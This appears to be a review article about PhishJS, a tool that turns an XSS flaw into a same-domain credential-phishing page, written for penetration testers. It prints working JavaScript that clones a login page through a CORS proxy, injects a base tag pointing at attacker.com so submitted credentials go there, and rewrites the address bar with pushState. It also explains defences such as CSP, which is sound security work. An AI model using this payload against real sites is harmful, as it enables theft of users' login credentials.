Back to Articles

PhishJS: When XSS on test.example.com Becomes a Credential Harvesting Nightmare

[ View on GitHub ]

PhishJS: When XSS on test.example.com Becomes a Credential Harvesting Nightmare

Hook

That forgotten XSS vulnerability on your staging subdomain? It's not just a low-severity ticket anymore—with 200 lines of JavaScript, an attacker can transform it into a pixel-perfect clone of your production login page that steals credentials while displaying your legitimate domain in the address bar.

Context

Security teams have long treated XSS vulnerabilities with a risk-based approach: reflected XSS on api.example.com gets a Medium rating, while the same vulnerability on mail.example.com might warrant Critical. The reasoning seems sound—why panic about script injection on a development subdomain when there's nothing sensitive to steal? PhishJS exists to demolish this mental model.

The tool addresses a gap in traditional phishing infrastructure. Classic phishing requires registering look-alike domains (examp1e.com), hosting infrastructure, and hoping users don't notice the subtle differences. Even sophisticated techniques like homograph attacks (using Cyrillic characters) get caught by modern browsers. PhishJS takes a different approach: instead of impersonating the target domain, it operates from within the target's own domain space, exploiting the implicit trust users place in seeing 'example.com' in their browser. By weaponizing low-impact XSS, it converts what might be dismissed as a P3 finding into a practical credential theft mechanism that bypasses most phishing awareness training.

Technical Insight

External Infrastructure

Victim Browser

Fetch via proxy

Retrieve HTML

HTML response

Parsed DOM

Points form to attacker

Fix CSS/JS paths

document.write

Display /login

POST credentials

XSS Payload Executes

CORS Proxy

Legitimate Login Page

DOM Parser

Inject Base Tag

Patch Resource URLs

Replace Page Content

Manipulate Browser URL

User Submits Form

Attacker Server

System architecture — auto-generated

PhishJS implements a surprisingly elegant attack chain that manipulates DOM APIs and browser behavior to create convincing phishing pages. The core technique revolves around dynamically cloning a legitimate login page while redirecting form submissions to attacker infrastructure—all from the context of an XSS payload.

The attack begins by fetching the target login page through a CORS proxy. This is necessary because directly fetching cross-origin content would violate same-origin policy. Here's the fundamental approach:

fetch('https://cors-anywhere.herokuapp.com/https://example.com/login')
  .then(response => response.text())
  .then(html => {
    // Parse the HTML
    const parser = new DOMParser();
    const doc = parser.parseFromString(html, 'text/html');
    
    // Inject base tag to hijack form submissions
    const base = doc.createElement('base');
    base.href = 'https://attacker.com/';
    doc.head.insertBefore(base, doc.head.firstChild);
    
    // Fix resource paths to load from legitimate domain
    doc.querySelectorAll('link[href], script[src], img[src]').forEach(el => {
      const attr = el.href ? 'href' : 'src';
      const url = el[attr];
      if (url && url.startsWith('/')) {
        el[attr] = 'https://example.com' + url;
      }
    });
    
    // Replace current page
    document.open();
    document.write(doc.documentElement.outerHTML);
    document.close();
  });

The <base> tag injection is particularly clever. This HTML element sets the base URL for all relative URLs in a document. When the cloned login form has <form action="/api/authenticate">, the browser resolves it relative to the base tag, sending credentials to https://attacker.com/api/authenticate instead of the legitimate endpoint. From the user's perspective, everything looks normal—the page styling is intact, the URL shows the trusted domain, and the form behaves as expected.

The resource patching phase is critical for maintaining visual fidelity. Without it, CSS and JavaScript files would attempt to load from the attacker's domain and fail. PhishJS walks the DOM tree, identifies resource references, and rewrites relative paths to absolute URLs pointing to the legitimate domain. This means stylesheets, fonts, and even JavaScript libraries load correctly, maintaining the authentic appearance of the login page.

URL manipulation adds another layer of deception. Using history.pushState(), the script can modify the browser's address bar to display '/login' or any path that enhances credibility:

window.history.pushState({}, '', '/login');

This doesn't trigger a page reload but updates what the user sees in the location bar. Combined with execution from a legitimate subdomain, the result is deeply convincing—the URL shows 'subdomain.example.com/login' while the page displays a perfect replica of the real login form.

The attack surface this creates is broader than it initially appears. Consider multi-tenant SaaS applications where customers get subdomains (customer1.saas-product.com). A stored XSS on one customer's subdomain could be weaponized to phish users from other customers by cloning the main login page. The victim sees 'customer1.saas-product.com/login' and may not question why they're logging in through a customer subdomain rather than the main domain.

From a defensive perspective, Content Security Policy should theoretically prevent this attack. A properly configured CSP with base-uri 'self' would block the base tag injection, and form-action directives would prevent form submission to external domains. However, PhishJS demonstrates what happens in the common scenario where CSP is absent or poorly configured—a situation that remains prevalent even in 2024.

Gotcha

PhishJS has hard dependencies that limit its practical applicability. The most obvious is requiring an existing XSS vulnerability—this isn't a tool for finding XSS, it's for weaponizing known vulnerabilities. That might seem trivial, but modern web applications with proper frameworks (React, Vue, Angular) make XSS increasingly rare. You're more likely to find exploitable XSS on legacy applications or custom-built admin panels.

The CORS proxy dependency is both a technical and operational weakness. Public CORS proxies like cors-anywhere.herokuapp.com have rate limits and availability issues. Running your own proxy requires infrastructure and creates detectable infrastructure patterns—blue teams can monitor for traffic to known CORS proxy domains. More critically, many modern applications use Subresource Integrity (SRI) hashes on their scripts and stylesheets. When PhishJS patches resource URLs, those resources load correctly, but if the original page had SRI attributes, the browser will reject them if the hashes don't match. The attack fails noisily, potentially alerting the user.

The 'hacky' nature of base tag injection, as the author acknowledges, means reliability varies wildly. Single-page applications that handle routing client-side might not use form submissions at all—they'll capture input events and make fetch() calls, completely bypassing the base tag hijack. Applications with JavaScript-based form validation might reject submissions that don't match expected patterns. And any application with a properly configured Content Security Policy essentially nullifies the entire approach. This makes PhishJS highly situational: effective against traditional server-rendered applications without CSP, nearly useless against modern SPAs with security headers.

Verdict

Use PhishJS if you're conducting authorized penetration tests and need to demonstrate the real-world impact of XSS findings that stakeholders are dismissing as low-severity. It excels at proving that 'just XSS on a dev subdomain' can escalate to credential theft, making it valuable for security advisory reports and executive briefings. The tool is particularly effective in red team engagements where you've achieved initial access through XSS and need to pivot to credential harvesting without deploying obvious phishing infrastructure. Skip if you're looking for automated XSS discovery, need persistent credential harvesting capabilities, or are targeting modern single-page applications with Content Security Policy. Also skip if you need production-grade reliability—this is a proof-of-concept tool that works best for demonstration purposes in controlled environments. For sophisticated phishing campaigns requiring 2FA bypass, look at Evilginx2 instead. For broader post-exploitation capabilities beyond credential theft, BeEF offers a more comprehensive framework.

// ADD TO YOUR README
[![Featured on Starlog](https://starlog.is/api/badge/developer-tools/infosec-au-phishjs.svg)](https://starlog.is/api/badge-click/developer-tools/infosec-au-phishjs)